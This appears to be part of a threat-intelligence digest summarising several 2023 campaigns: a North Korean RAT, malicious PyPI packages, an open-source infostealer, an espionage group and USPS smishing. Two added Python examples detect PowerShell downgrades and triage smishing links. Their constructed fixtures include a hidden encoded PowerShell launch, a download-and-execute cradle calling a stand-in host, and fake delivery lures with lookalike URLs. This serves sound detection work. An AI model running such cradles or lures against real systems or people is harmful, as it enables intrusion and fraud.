<br/> <b>Analyst Comment:</b> Spearphishing emails and activist impersonation remains a popular tactic among state-sponsored groups. Journalists should evaluate the risk and abstain from opening risky attachments such as LNK files. All known indicators associated with the SuperBear sample are available in the Anomali platform and customers are advised to block these on their infrastructure. This incident and other Advisory, News and Blog sources were made available in Anomali ThreatStream as RSS feeds, and for AutoLens+ subscribers these are also tagged and summarized.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10001" target="_blank">[MITRE ATT&amp;CK] T1566.001 - Phishing: Spearphishing Attachment</a> | <a href="https://ui.threatstream.com/attackpattern/9920" target="_blank">[MITRE ATT&amp;CK] T1055.012 - Process Injection: Process Hollowing</a> | <a href="https://ui.threatstream.com/attackpattern/22938" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Obfuscated Files or Information [T1027]</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/3712" target="_blank">[MITRE ATT&amp;CK] T1059.001: PowerShell</a> | <a href="https://ui.threatstream.com/attackpattern/9853" target="_blank">[MITRE ATT&amp;CK] T1059.005 - Command and Scripting Interpreter: Visual Basic</a> | <a href="https://ui.threatstream.com/attackpattern/10048" target="_blank">[MITRE ATT&amp;CK] T1584 - Compromise Infrastructure</a> | <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a><br/> <b>Tags:</b> malware:SuperBear, malware-type:RAT, target-country:KR, source-country:KP, target-industry:Media, target-industry:Information, technique:PowerShell, technique:Process hollowing, language:AutoIT, 
language:VBS, file-type:AU3, file-type:EXE, file-type:LNK, file-type:PDB, target-system:Windows </p> <h3 id="article-1"><a href="https://www.reversinglabs.com/blog/vmconnect-supply-chain-campaign-continues" target="_blank">VMConnect Supply Chain Attack Continues, Evidence Points to North Korea</a></h3> <p>(published: August 31, 2023)</p> <p> North Korea-sponsored Lazarus Group has been identified as the actor behind a malicious campaign targeting the Python Package Index (PyPI) repository. ReversingLabs dubbed this campaign VMConnect because Lazarus has been uploading malicious packages impersonating popular software projects, including a VMware vSphere connector module named vConnector. These packages were downloaded hundreds of times before being removed. They contained a file that triggered data collection from the infected machine, with the information being sent to the attackers' command and control servers. Lazarus has been employing various detection evasion techniques including encryption, endless loops, obfuscation, and executing the malicious payloads only after they had been imported to and called on by legitimate applications.<br/> <b>Analyst Comment:</b> Developers should receive appropriate training as to not fall for typosquatting and other impersonation attacks. Organizations should ensure that any open-source or proprietary code is evaluated for the presence of suspicious or malicious indicators, including hidden (obfuscated) functionality, and unexplained communications with third-party infrastructure. 
All known network indicators associated with the VMConnect campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/22938" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Obfuscated Files or Information [T1027]</a> | <a href="https://ui.threatstream.com/attackpattern/10000" target="_blank">[MITRE ATT&amp;CK] T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a> | <a href="https://ui.threatstream.com/attackpattern/9715" target="_blank">[MITRE ATT&amp;CK] T1071.001 - Application Layer Protocol: Web Protocols</a><br/> <b>Tags:</b> actor:Lazarus Group, actor:DangerousPassword, actor:Labyrinth Chollima, source-country:KP, technique:Package typosquatting, campaign:VMConnect, threat-type:Software supply chain, abused:PyPI, abused:Base64, abused:XOR </p> <h3 id="article-1"><a href="https://blog.talosintelligence.com/sapphirestealer-goes-open-source/" target="_blank">SapphireStealer: Open-Source Information Stealer Enables Credential and Data Theft</a></h3> <p>(published: August 31, 2023)</p> <p> SapphireStealer, an open-source information stealer malware, has been identified as a growing threat since its release on GitHub in December 2022. In January 2023, the 0day2 account behind the initial SapphireStealer release posted another .NET malware called FUD-Loader that some of the users of SapphireStealer included in their infostealer delivery chain. SapphireStealer gathers host information, takes screenshots, harvests cached browser credentials, and collects files with predefined extensions. 
The stolen data is then compressed and sent to the attacker via SMTP. SapphireStealer has seen notable modifications by different threat actors, including the use of the Discord webhook API and Telegram posting API for data exfiltration.<br/> <b>Analyst Comment:</b> Readily-available and open-source malware is dangerous as it lowers the barrier to entry, enables fast evolution and variety of infection chains. All known indicators associated with recent SapphireStealer campaigns are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10025" target="_blank">[MITRE ATT&amp;CK] T1555.003 - Credentials from Password Stores: Credentials From Web Browsers</a> | <a href="https://ui.threatstream.com/attackpattern/13021" target="_blank">[MITRE ATT&amp;CK] Picus: The System Information Discovery Technique Explained - MITRE ATT&amp;CK T1082</a> | <a href="https://ui.threatstream.com/attackpattern/9671" target="_blank">[MITRE ATT&amp;CK] T1113 - Screen Capture</a> | <a href="https://ui.threatstream.com/attackpattern/3708" target="_blank">[MITRE ATT&amp;CK] T1005: Data from Local System</a> | <a href="https://ui.threatstream.com/attackpattern/9710" target="_blank">[MITRE ATT&amp;CK] T1057 - Process Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9950" target="_blank">[MITRE ATT&amp;CK] T1489 - Service Stop</a> | <a href="https://ui.threatstream.com/attackpattern/9693" target="_blank">[MITRE ATT&amp;CK] T1560.001 - Archive Collected Data: Archive Via Utility</a> | <a href="https://ui.threatstream.com/attackpattern/9742" target="_blank">[MITRE ATT&amp;CK] T1048 - Exfiltration Over Alternative Protocol</a> | <a href="https://ui.threatstream.com/attackpattern/9983" target="_blank">[MITRE ATT&amp;CK] T1016 - System Network Configuration Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9770" target="_blank">[MITRE 
ATT&amp;CK] T1070.004 - Indicator Removal on Host: File Deletion</a> | <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a> | <a href="https://ui.threatstream.com/attackpattern/9746" target="_blank">[MITRE ATT&amp;CK] T1567 - Exfiltration Over Web Service</a><br/> <b>Tags:</b> malware:SapphireStealer, malware-type:Infostealer, threat-type:Open-source, malware:FUD-Loader, malware-type:Downloader, actor:0day2, actor:romanmaslov200, abused:Discord webhook API, abused:Telegram posting API, language:.NET, file-type:EXE, target-system:Windows </p> <h3 id="article-1"><a href="https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html" target="_blank">Earth Estries Targets Government, Tech for Cyberespionage</a></h3> <p>(published: August 30, 2023)</p> <p> Trend Micro researchers have uncovered activity by a cyberespionage group dubbed Earth Estries that has been operating since at least 2020. The group targets government and tech organizations in various countries (Germany, Malaysia, the Philippines, South Africa, Taiwan, and the US), using advanced tactics such as PowerShell downgrade attacks and compromising accounts with administrative privileges. They use tools like Cobalt Strike, Meterpreter, and PlugX to infiltrate networks while focusing on the theft of PDF and DDF files. The group's toolkit includes a range of tools, including the heavily-obfuscated HTTP backdoor Zingdoor, an information stealer called TrillClient, and HemiGate, another backdoor executed via DLL sideloading. 
The group uses various domains for its command-and-control (C2) infrastructure and often hides behind content delivery networks (CDNs) to obscure its IP addresses.<br/> <b>Analyst Comment:</b> Earth Estries heavily relies on DLL sideloading attacks against older versions of legitimate files, which makes it even more important to implement version controls and application baselines. All known indicators associated with this campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/9700" target="_blank">[MITRE ATT&amp;CK] T1087 - Account Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9873" target="_blank">[MITRE ATT&amp;CK] T1482 - Domain Trust Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/23579" target="_blank">[MITRE ATT&amp;CK] Picus: T1047 Windows Management Instrumentation of the MITRE ATT&amp;CK Framework</a> | <a href="https://ui.threatstream.com/attackpattern/3712" target="_blank">[MITRE ATT&amp;CK] T1059.001: PowerShell</a> | <a href="https://ui.threatstream.com/attackpattern/3718" target="_blank">[MITRE ATT&amp;CK] T1569.002: Service Execution</a> | <a href="https://ui.threatstream.com/attackpattern/9647" target="_blank">[MITRE ATT&amp;CK] T1021.002 - Remote Services: Smb/Windows Admin Shares</a> | <a href="https://ui.threatstream.com/attackpattern/10104" target="_blank">[MITRE ATT&amp;CK] T1574.002 - Hijack Execution Flow: Dll Side-Loading</a> | <a href="https://ui.threatstream.com/attackpattern/9592" target="_blank">[MITRE ATT&amp;CK] T1027.002 - Obfuscated Files or Information: Software Packing</a> | <a href="https://ui.threatstream.com/attackpattern/10101" target="_blank">[MITRE ATT&amp;CK] T1036.004 - Masquerading: Masquerade Task Or Service</a> | <a href="https://ui.threatstream.com/attackpattern/10081" target="_blank">[MITRE ATT&amp;CK] T1036.005 - Masquerading: Match 
Legitimate Name Or Location</a> | <a href="https://ui.threatstream.com/attackpattern/9767" target="_blank">[MITRE ATT&amp;CK] T1070 - Indicator Removal On Host</a> | <a href="https://ui.threatstream.com/attackpattern/12872" target="_blank">[MITRE ATT&amp;CK] T1562.010 - Impair Defenses: Downgrade Attack</a> | <a href="https://ui.threatstream.com/attackpattern/9719" target="_blank">[MITRE ATT&amp;CK] T1134.001 - Access Token Manipulation: Token Impersonation/Theft</a> | <a href="https://ui.threatstream.com/attackpattern/9931" target="_blank">[MITRE ATT&amp;CK] T1053.005 - Scheduled Task/Job: Scheduled Task</a> | <a href="https://ui.threatstream.com/attackpattern/9933" target="_blank">[MITRE ATT&amp;CK] T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</a> | <a href="https://ui.threatstream.com/attackpattern/9860" target="_blank">[MITRE ATT&amp;CK] T1543.003 - Create or Modify System Process: Windows Service</a> | <a href="https://ui.threatstream.com/attackpattern/9870" target="_blank">[MITRE ATT&amp;CK] T1078 - Valid Accounts</a> | <a href="https://ui.threatstream.com/attackpattern/9693" target="_blank">[MITRE ATT&amp;CK] T1560.001 - Archive Collected Data: Archive Via Utility</a> | <a href="https://ui.threatstream.com/attackpattern/9888" target="_blank">[MITRE ATT&amp;CK] T1056.001 - Input Capture: Keylogging</a> | <a href="https://ui.threatstream.com/attackpattern/9671" target="_blank">[MITRE ATT&amp;CK] T1113 - Screen Capture</a> | <a href="https://ui.threatstream.com/attackpattern/9715" target="_blank">[MITRE ATT&amp;CK] T1071.001 - Application Layer Protocol: Web Protocols</a> | <a href="https://ui.threatstream.com/attackpattern/9891" target="_blank">[MITRE ATT&amp;CK] T1071.004 - Application Layer Protocol: Dns</a> | <a href="https://ui.threatstream.com/attackpattern/9748" 
target="_blank">[MITRE ATT&amp;CK] T1567.002 - Exfiltration Over Web Service: Exfiltration To Cloud Storage</a><br/> <b>Tags:</b> actor:Earth Estries, actor:FamousSparrow, malware:Cobalt Strike, detection:Trojan.Win64.COBEACON, malware:PlugX, malware:Meterpreter, malware:Zingdoor, detection:Backdoor.Win32.ZINGDOOR, detection:Backdoor.Win64.ZINGDOOR, malware:HemiGate, malware-type:Backdoor, detection:Backdoor.Win32.HEMIGATE, detection:Trojan.Win64.DRACULOADER, malware:TrillClient, malware-type:Infostealer, detection:Trojan.Win64.TRILLCLIENT, detection:Trojan.Win32.TRILLINSTALLER, target-industry:Government, target-industry:Tech, Cyberespionage, technique:PowerShell downgrade, technique:AMSI bypass, abused:Github, abused:Gmail, abused:AnonFiles, abused:Fastly CDN, abused:File-io, target-country:PH, target-country:TW, target-country:MY, target-country:ZA, target-country:DE, target-country:US, language:Golang, cs-watermark:2029527128, file-type:CAB, file-type:DLL, file-type:EXE, target-system:Windows </p> <h3 id="article-1"><a href="https://www.resecurity.com/blog/article/smishing-triad-targeted-usps-and-us-citizens-for-data-theft" target="_blank">"Smishing Triad" Targeted USPS and US Citizens for Data Theft</a></h3> <p>(published: August 30, 2023)</p> <p> A China-based cyber-criminal group dubbed Smishing Triad has been conducting large-scale smishing campaigns targeting Indonesia, Italy, Japan, Poland, Sweden, UK, US, and other countries. The group mostly impersonates various postal and delivery services and uses iMessages from compromised Apple iCloud accounts to send package-tracking text scams, aiming to collect personally identifying information and payment credentials. Their latest campaign analyzed by Resecurity researchers was targeting US citizens with USPS-themed messages. Other Smishing Triad activities include attacking online-shopping platforms via malicious code injections that intercept customer data, and selling smishing kits via Telegram groups. 
Resecurity also identified a cluster of Vietnamese-speaking actors as affiliates of the Smishing Triad fraud-as-a-service network, and found over 108,044 records of victims’ compromised data.<br/> <b>Analyst Comment:</b> Users should avoid clicking unsolicited tracking links; legitimate postal services do not ask for payment or personal details through unsolicited text messages. Because these lures arrive over iMessage from compromised iCloud accounts rather than as carrier SMS, carrier-side spam filtering does not see them, so user awareness and reporting carry more weight than usual. Regularly check your banking statements for suspicious transactions. Users receiving smishing messages may consider reporting them to the appropriate authorities: take a screenshot or copy the body of the suspicious message without opening the link, and use the Report Junk option iMessage offers for senders who are not in your contacts. All known network indicators associated with this campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10041" target="_blank">[MITRE ATT&amp;CK] T1583.001 - Acquire Infrastructure: Domains</a> | <a href="https://ui.threatstream.com/attackpattern/10048" target="_blank">[MITRE ATT&amp;CK] T1584 - Compromise Infrastructure</a> | <a href="https://ui.threatstream.com/attackpattern/10028" target="_blank">[MITRE ATT&amp;CK] T1566.002 - Phishing: Spearphishing Link</a><br/> <b>Tags:</b> actor:Smishing Triad, actor:wangduoyu8, actor:dy_tongbu, target-organization:USPS, target-country:US, source-country:CN, source-country:VN, threat-type:Data Theft, technique:Smishing, technique:SQL injection, abused:iMessages, target-system:Apple iCloud, threat-type:Fraud-as-a-service </p> </div> </p></div>
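<p>The PowerShell downgrade attacks attributed to Earth Estries above leave a characteristic trace in the classic "Windows PowerShell" event log: an Event ID 400 engine start whose EngineVersion is 2.x while the HostVersion is 3.x or newer, or a command line that asks for <code>-Version 2</code> outright. The Python below is an added example written for this digest, not Trend Micro's or Anomali's code: it applies those two checks to constructed log records. The one-line key=value rendering of the event fields, the host names and the command lines are all assumptions made for the example.</p>

```python
"""Flag PowerShell engine downgrades in classic Windows PowerShell log records.

Added example. Assumptions: each record is a one-line key=value rendering of
Event ID 400 (engine start) from the "Windows PowerShell" log with the fields
EventID, Host, EngineVersion, HostVersion and HostApplication. The host names
and command lines below are constructed for the example.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SAMPLE_EVENTS = [
    # Normal 5.1 engine start from the default host.
    "EventID=400 Host=ws01 EngineVersion=5.1.19041.1 HostVersion=5.1.19041.1 "
    "HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    # Downgrade: 2.0 engine under a 5.1 host, explicit -version 2, hidden window, encoded command.
    "EventID=400 Host=ws02 EngineVersion=2.0 HostVersion=5.1.19041.1 "
    "HostApplication=powershell.exe -version 2 -nop -w hidden -enc SQBFAFgA",
    # Legitimate admin script with a policy bypass but no downgrade.
    "EventID=400 Host=ws03 EngineVersion=5.1.19041.1 HostVersion=5.1.19041.1 "
    "HostApplication=powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    # Legacy box that only has the 2.0 engine: an inventory note, not a downgrade.
    "EventID=400 Host=ws04 EngineVersion=2.0 HostVersion=2.0 "
    "HostApplication=powershell.exe -NoProfile",
    # Short-form flag (-v 2) feeding a download cradle; must be caught as well.
    "EventID=400 Host=ws05 EngineVersion=2.0 HostVersion=5.1.19041.1 "
    "HostApplication=powershell.exe -v 2 -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
    # Engine stop (403) for the same session: not an engine start, ignored.
    "EventID=403 Host=ws02 EngineVersion=2.0 HostVersion=5.1.19041.1 "
    "HostApplication=powershell.exe -version 2",
]

# Field extractors. HostApplication is last and may contain spaces, so it
# takes the rest of the line instead of a single token.
FIELD_RE = {
    "EventID": re.compile(r"\bEventID=(\d+)"),
    "Host": re.compile(r"\bHost=(\S+)"),
    "EngineVersion": re.compile(r"\bEngineVersion=(\S+)"),
    "HostVersion": re.compile(r"\bHostVersion=(\S+)"),
    "HostApplication": re.compile(r"\bHostApplication=(.*)$"),
}

# -version 2, -v 2 and every unambiguous prefix in between that powershell.exe accepts.
VERSION_FLAG_RE = re.compile(r"(?i)(?:^|\s)-v(?:ersion|ersio|ersi|ers|er|e)?\s+2(?:\.0)?(?!\S)")


@dataclass
class Finding:
    host: str
    severity: str        # "high" = downgrade, "info" = legacy engine only
    reasons: List[str]
    command_line: str


def parse_event(line: str) -> Optional[Dict[str, str]]:
    """Pull the needed fields out of one record; None if any is missing."""
    fields: Dict[str, str] = {}
    for name, rx in FIELD_RE.items():
        m = rx.search(line)
        if not m:
            return None
        fields[name] = m.group(1).strip()
    return fields


def major(version: str) -> int:
    """Major component of a dotted version string, 0 if unparseable."""
    try:
        return int(version.split(".")[0])
    except ValueError:
        return 0


def assess(fields: Dict[str, str]) -> Optional[Finding]:
    """Apply the two downgrade signals to one engine-start record."""
    if fields["EventID"] != "400":
        return None
    engine, host = major(fields["EngineVersion"]), major(fields["HostVersion"])
    cmd = fields["HostApplication"]
    reasons: List[str] = []
    # Signal 1: a 2.0 engine started by a 3.0+ host means the newer engine
    # (with AMSI and script block logging) was deliberately bypassed.
    if engine == 2 and host >= 3:
        reasons.append(f"2.0 engine started by a {fields['HostVersion']} host")
    # Signal 2: the command line asks for version 2 outright.
    if VERSION_FLAG_RE.search(cmd):
        reasons.append("command line explicitly requests -Version 2")
    if reasons:
        return Finding(fields["Host"], "high", reasons, cmd)
    if engine == 2:
        return Finding(fields["Host"], "info",
                       ["only the 2.0 engine is present; no AMSI or script block logging"], cmd)
    return None


def detect_downgrades(lines: List[str]) -> List[Finding]:
    """Run every record through the parser and the downgrade rules."""
    findings: List[Finding] = []
    for line in lines:
        fields = parse_event(line)
        if fields is None:
            continue
        finding = assess(fields)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in detect_downgrades(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.host}: {'; '.join(f.reasons)} | {f.command_line}")
```

<p>On the constructed input, ws02 and ws05 are reported as downgrades (both signals fire on each), ws04 is reported as an informational legacy-engine finding, and the normal 5.1 starts and the Event 403 stop are ignored. The same two conditions map directly onto a SIEM rule over the EngineVersion, HostVersion and HostApplication fields; pair it with process-creation telemetry for the <code>-v 2</code> flag, since the classic log can be disabled by the attacker.</p>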
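<p>For the Smishing Triad lures described above, the useful automated check is whether the link in a postal-themed message actually resolves to the brand's own registrable domain, since the kits put the brand name in a subdomain or hyphenated label on a domain they control. The Python below is an added example, not Resecurity's tooling: it extracts URLs from constructed sample messages, derives the registrable domain with a small stand-in for the Public Suffix List, and flags brand keywords or punycode outside the brand's allowlisted domains. <code>BRAND_DOMAINS</code>, <code>TWO_LEVEL_SUFFIXES</code>, the lure word list and every message are assumptions made for the example.</p>

```python
"""Triage package-delivery smishing lures by checking where their links really go.

Added example, not Resecurity's tooling. Assumptions: BRAND_DOMAINS maps a brand
keyword to the registrable domains that brand legitimately uses (a stub; fill it
from your own allowlist), TWO_LEVEL_SUFFIXES stands in for the Public Suffix
List, and every message in SAMPLE_MESSAGES is constructed for the example.
"""
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

BRAND_DOMAINS: Dict[str, Set[str]] = {
    "usps": {"usps.com"},
    "royal mail": {"royalmail.com"},
}
TWO_LEVEL_SUFFIXES = {"co.uk", "com.au", "co.jp", "com.br"}

# Delivery-themed words the kits lean on.
LURE_RE = re.compile(r"(?i)\b(package|parcel|delivery|shipment|tracking|address|redeliver|customs|postage|fee)\b")
# Either a full URL or a bare domain followed by a path ("usps-track.top/us").
URL_RE = re.compile(r'(?i)\bhttps?://[^\s<>"]+|\b(?:[a-z0-9-]+\.)+[a-z]{2,}/[^\s<>"]*')

SAMPLE_MESSAGES = [  # constructed
    "USPS: your package is on hold due to an incomplete address. Confirm here: https://usps-redelivery-track.top/us",
    "USPS: your package 9400100000000000000000 is out for delivery. Track at https://tools.usps.com/go/TrackConfirmAction",
    "Your parcel could not be delivered, update your details: http://delivery-update.cc/p/8f2",
    "Royal Mail: a parcel is waiting, pay the 1.99 fee at royalmail-fee.uk-post.online/pay",
    "Dinner at 7? I'll bring dessert.",
    "USPS notice: confirm your address at https://xn--usp-7ya.com/track",
]


def registrable_domain(host: str) -> str:
    """Naive eTLD+1: last two labels, or three under a known two-level suffix."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def hostname_of(url: str) -> str:
    """Host part of a URL, tolerating scheme-less links."""
    if not re.match(r"(?i)https?://", url):
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def brands_in(text: str) -> Set[str]:
    t = text.lower()
    return {b for b in BRAND_DOMAINS if b in t}


def classify_url(url: str, brands: Set[str]) -> Tuple[str, str]:
    """Return (kind, reason); kind is legit, lookalike, offbrand or unknown."""
    host = hostname_of(url)
    rd = registrable_domain(host)
    # Brand keyword squeezed into the host, e.g. usps-redelivery-track.top or
    # usps.com.verify-track.top: only an allowlisted registrable domain clears it.
    flat = host.replace("-", "").replace(".", "")
    host_brands = {b for b in BRAND_DOMAINS if b.replace(" ", "") in flat}
    for b in brands | host_brands:
        if rd in BRAND_DOMAINS[b]:
            return "legit", f"{host} is a known {b} domain"
    if any(label.startswith("xn--") for label in host.split(".")):
        return "lookalike", f"{host} uses a punycode label"
    if host_brands:
        return "lookalike", f"{host} carries a brand name but is not a brand domain"
    if brands:
        return "offbrand", f"{host} is not a domain of {', '.join(sorted(brands))}"
    return "unknown", f"{host} is not on any brand list"


def triage(message: str) -> Dict[str, object]:
    """Combine lure words, brand mention and per-link verdicts into one decision."""
    brands = brands_in(message)
    lure = LURE_RE.search(message) is not None
    urls = [(u, *classify_url(u, brands)) for u in URL_RE.findall(message)]
    kinds = {kind for _, kind, _ in urls}
    if "lookalike" in kinds or (lure and "offbrand" in kinds):
        verdict = "smishing"
    elif lure and "unknown" in kinds:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "brands": sorted(brands), "lure": lure, "urls": urls}


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        r = triage(msg)
        print(f"{r['verdict']:<8} {msg[:60]}")
        for url, kind, why in r["urls"]:
            print(f"         {kind:<9} {why}")
```

<p>The constructed messages come out as smishing, clean, review, smishing, clean, smishing: the USPS link on a .top domain, the brand name buried in <code>royalmail-fee.uk-post.online</code>, and the punycode host are all caught, while the real <code>tools.usps.com</code> link is cleared because its registrable domain is on the allowlist. The brand-free parcel lure is sent to review rather than blocked, since nothing ties it to a known brand. In production, replace <code>registrable_domain</code> with a Public Suffix List implementation; the two-level suffix set here is only a placeholder.</p>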